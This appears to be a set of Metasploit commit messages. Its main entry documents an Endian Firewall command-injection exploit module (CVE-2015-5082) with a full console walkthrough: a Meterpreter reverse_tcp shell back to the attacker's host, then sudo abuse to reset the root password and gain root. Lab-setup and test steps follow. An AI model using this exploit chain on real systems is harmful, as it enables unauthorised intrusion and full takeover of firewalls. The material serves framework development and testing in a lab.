Most exploits don't check nil for generate_payload_exe, they just
assume they will always have a payload. If the method returns nil,
it ends up making debugging more difficult. Instead of checking nil
one by one, we just raise.
This allows the cmdstager mixin to automatically pass the arch
and platform information without changing the modules. This should
address the following tickets:
Fix#5727Fix#5718Fix#5761
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5082
(CVE is new as of today, so that page may not display correctly yet)
Targets an OS command injection vulnerability in most released versions
of Endian Firewall. Tested successfully against the following versions:
1.1 RC5
2.0
2.1
2.2
2.5.1
2.5.2
Known to not work against the following versions, due to bugs in the
vulnerable CGI script which also prevent normal use of it:
2.3
2.4.0
3.0.0
3.0.5 beta 1
Requires that at least one username and password be defined in the
local auth store for the Squid proxy component on the system, and that
the attacker know that username and password. Administrative or other
credentials are not required.
Provides OS command execution as the "nobody" account, which (on
all tested versions) has sudo permission to (among other things) run
a script which changes the Linux root account's password.
Example usage / output:
```
msf > use exploit/linux/http/efw_chpasswd_exec
msf exploit(efw_chpasswd_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(efw_chpasswd_exec) > set LHOST 172.16.47.13
LHOST => 172.16.47.13
msf exploit(efw_chpasswd_exec) > set LPORT 443
LPORT => 443
msf exploit(efw_chpasswd_exec) > set RHOST 172.16.47.1
RHOST => 172.16.47.1
msf exploit(efw_chpasswd_exec) > set EFW_USERNAME proxyuser
EFW_USERNAME => proxyuser
msf exploit(efw_chpasswd_exec) > set EFW_PASSWORD password123
EFW_PASSWORD => password123
msf exploit(efw_chpasswd_exec) > exploit
[*] Started reverse handler on 172.16.47.13:443
[*] Command Stager progress - 18.28% done (196/1072 bytes)
[*] Command Stager progress - 36.57% done (392/1072 bytes)
[*] Command Stager progress - 54.85% done (588/1072 bytes)
[*] Command Stager progress - 73.13% done (784/1072 bytes)
[*] Command Stager progress - 91.42% done (980/1072 bytes)
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1138688 bytes) to 172.16.47.1
[*] Meterpreter session 1 opened (172.16.47.13:443 -> 172.16.47.1:36481) at 2015-06-29 10:20:13 -0700
[*] Command Stager progress - 100.47% done (1077/1072 bytes)
meterpreter > getuid
Server username: uid=99, gid=99, euid=99, egid=99, suid=99, sgid=99
meterpreter > sysinfo
Computer : efw220.vuln.local
OS : Linux efw220.vuln.local 2.6.22.19-72.endian15 #1 SMP Mon Sep 8 11:49:17 EDT 2008 (i686)
Architecture : i686
Meterpreter : x86/linux
meterpreter > shell
Process 5768 created.
Channel 1 created.
sh: no job control in this shell
sh-3.00$ whoami
nobody
sh-3.00$ uname -a
Linux efw220.vuln.local 2.6.22.19-72.endian15 #1 SMP Mon Sep 8 11:49:17 EDT 2008 i686 i686 i386 GNU/Linux
sh-3.00$ sudo /usr/local/bin/chrootpasswd
IlikerootaccessandIcannotlie
sh-3.00$ su
Password:IlikerootaccessandIcannotlie
bash: no job control in this shell
bash-3.00# whoami
root
```
Steps to verify module functionality:
Go to http://sourceforge.net/projects/efw/files/Development/
Select version 2, 2.1, 2.2, 2.5.1, or 2.5.2.
Download the ISO file for that version.
Create a VM using the ISO:
For purposes of VM configuration:
- Endian is based on the RHEL/CentOS/Fedora Core Linux
distribution.
- The ISOs will create a 32-bit x86 system.
- 512MB of RAM and 4GB of disk space should be more than enough.
- Be sure to configure the VM with at least two NICs, as the Endian
setup is difficult (impossible?) to complete with less than two
network interfaces on the host.
For the Endian OS-level (Linux) installation:
- Default options are fine where applicable.
- Be sure to pick a valid IP for the "Green" network interface, as
you will use it to access a web GUI to complete the configuration
- If prompted to create a root/SSH password and/or web admin
password, make a note of them. Well, make a note of the web admin
password - the exploit module will let you change the root
password later if you want to. This step is dependent on the
version selected - some will prompt, others default the values to
"endian".
- Once the OS-level configuration is complete, access the web
interface to complete the setup. If you used 172.16.47.1 for the
"Green" interface, then the URL will be
https://172.16.47.1:10443/
- If the web interface is not accessible, reboot the VM (in some
versions, the web interface does not come up until after the
first post-installation reboot).
For the web interface-based configuration:
- If you were prompted to select an admin password, use it. If not,
the username/password is admin/endian.
- Use the second NIC for the "Red" interface. It will not actually
be used during this walkthrough, so feel free to specify a bogus
address on a different/nonexistent subnet. Same for its default
gateway.
- Once the base configuration is complete, access the main web
interface URL again.
- Switch to the Proxy tab.
- Enable the HTTP proxy.
- Click Save (or Apply, depending on version).
- If prompted to apply the settings, do so.
- Click on the Authentication sub-tab.
- Make sure the Authentication Method is Local (this should be the
default).
- Click the _manage users_ (Or _User management_, etc., depending
on version) button.
- Click the _Add NCSA user_ (or _Add a user_, etc.) link.
- Enter "proxyuser" for the username, and "password123" for the
password, or modify the directions below this point accordingly.
- Click the _Create user_ button.
- If prompted to apply the settings, do so.
Module test process:
From within the MSF console, execute these commands:
use exploit/linux/http/efw_chpasswd_exec
set payload linux/x86/meterpreter/reverse_tcp
set LHOST [YOUR_HOST_IP]
set LPORT 443
set RHOST [ENDIAN_GREEN_IP]
set EFW_USERNAME proxyuser
set EFW_PASSWORD password123
exploit
Once Meterpreter connects, execute the following Meterpreter
commands:
getuid
sysinfo
shell
Within the OS shell, execute the following commands:
whoami
uname -a
sudo -l
sudo /usr/local/bin/chrootpasswd
It will appear as though the command has hung, but it is actually
waiting for input. Type "IlikerootaccessandIcannotlie", then press
enter.
Execute the following OS command in the shell:
su
Type "IlikerootaccessandIcannotlie", then press enter.
Verify root access (whoami, etc.).
Edited modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb first landed
in #5150, @wchen-r7's DOS module for CVE-2015-1635 HTTP.sys
Edited modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb
first landed in #5192, @joevennix's module for Safari CVE-2015-1126
Edited modules/auxiliary/gather/java_rmi_registry.rb first landed in
Edited modules/auxiliary/gather/ssllabs_scan.rb first landed in #5016,
add SSL Labs scanner
Edited modules/auxiliary/scanner/http/goahead_traversal.rb first landed
in #5101, Add Directory Traversal for GoAhead Web Server
Edited modules/auxiliary/scanner/http/owa_iis_internal_ip.rb first
landed in #5158, OWA internal IP disclosure scanner
Edited modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb
first landed in #5159, WordPress Mobile Edition Plugin File Read Vuln
Edited modules/exploits/linux/http/multi_ncc_ping_exec.rb first landed
in #4924, @m-1-k-3's DLink CVE-2015-1187 exploit
Edited modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb first
landed in #5131, WordPress Slideshow Upload
Edited modules/exploits/windows/local/run_as.rb first landed in #4649,
improve post/windows/manage/run_as and as an exploit
(These results courtesy of a delightful git alias, here:
```
cleanup-prs = !"for i in `git status | grep modules | sed
s/#.*modules/modules/`; do echo -n \"Edited $i first landed in \" && git
log --oneline --first-parent $i | tail -1 | sed 's/.*Land //' && echo
''; done"
```
So that's kind of fun.
Fix#5103. By default, Httpclient will encode the URI but
we don't necessarily want that. These modules originally
didn't use URI encoding when they were written so we should
just keep them that way.
Since Ruby 2.1, the respond_to? method is more strict because it does
not check protected methods. So when you use send(), clearly you're
ignoring this type of access control. The patch is meant to preserve
this behavior to avoid potential breakage.
Resolve#4507
See #4400. This should be all of them, except for, of course, the module
that targets Redmine itself.
Note that this also updates the README.md with more current information
as well.
This change adds two new Rex exceptions and changes the local comm to raise the right one depending on the circumstances. The problem with the existing model is
that failed binds and failed connections both raised the same exception. This change is backwards compatible with modules that rescue Rex::AddressInUse in additi
on to Rex::ConnectionError. There were two corner cases that rescued Rex::AddressInUse specifically:
1. The 'r'-services mixin and modules caught the old exception when handling bind errors. These have been updated to use BindFailed
2. The meterpreter client had a catch for the old exception when the socket reports a bad destination (usually a network connection dropped). This has been updat
ed to use InvalidDestination as that was the intention prior to this change.
Since AddressInUse was part of ConnectionError, modules and mixins which caught both in the same rescue have been updated to just catch ConnectionError.
See the complaint on #4039. This doesn't fix that particular
issue (it's somewhat unrelated), but does solve around
a file parsing problem reported by @void-in
"Right is right even if no one is doing it; wrong is wrong even if everyone is doing it"
user@x:/opt/metasploit$ grep -nr "select(nil, nil, nil" . | wc -l
189
user@x:/opt/metasploit$ grep -nr "Rex.sleep" . | wc -l
25
Certain modules will only work with the echo cmd stager so
specify that one as a parameter to execute_cmdstager and
remove the datastore options to change it.
dmohanty-r7
karllll
wchen-r7
James Lee
HD Moore
Jon Hart
m0t
Tod Beardsley
jvazquez-r7
Christian Mehlmauer
Michael Messner
Ben Lincoln
aos
m-1-k-3
Sven Vetsch
William Vu
OJ
headlesszeke
Rasta Mouse
Mark Schloesser
Joe Vennix
Luke Imhoff
URI Assassin
0a2940
Brandon Perry
Jakob Lell
Spencer McIntyre
Joshua Smith